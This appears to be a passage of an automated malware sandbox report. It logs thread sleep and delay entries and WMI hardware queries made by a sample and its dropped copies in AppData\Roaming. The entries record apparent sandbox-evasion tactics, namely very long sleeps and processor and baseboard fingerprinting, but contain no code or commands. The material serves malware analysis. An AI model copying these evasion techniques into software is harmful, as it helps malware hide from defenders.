                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -599765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -599545s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -599219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598999s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598551s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -598039s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597929s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597702s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597470s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -597000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596670s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596452s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -596015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -595906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -595788s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -595672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -595489s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -595227s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -595109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -594994s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -594854s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -594749s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -594640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -594531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -594422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -594312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -594203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep count: 38 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -35048813740048126s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8108Thread sleep count: 2472 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8108Thread sleep count: 7371 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -599765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -599546s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -599327s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598999s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598452s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598342s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -598109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597996s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597871s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597747s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597202s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -597091s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596435s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -596000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -595890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -595781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -595671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -595562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -595439s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -595312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -595202s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -595045s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -594934s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -594812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -594703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -594593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -594484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3868Thread sleep time: -594374s >= -30000s
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599746Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599637Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598967Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598709Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598440Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598180Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598078Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597968Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597640Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597530Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597297Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597186Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597073Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596746Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596629Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596500Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596390Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596281Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596171Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596062Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595952Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595837Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595715Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595592Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595323Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594672Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594343Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594232Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594124Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599436
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599327
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599000
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598891
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598657
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598491
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598382
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597923
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597729
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597620
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597457
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597328
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597182
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597063
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596936
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596768
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596641
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596520
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596360
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596226
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596112
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595990
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595735
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595610
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595485
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594948
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594823
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594713
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594594
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594484
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594375
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594266
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594156
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594047
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593931
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593813
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593698
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593578
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593469
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593344
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599545
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598999
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598551
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598312
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598187
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598039
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597929
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597702
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597470
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597344
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596670
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596452
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596344
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595788
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595672
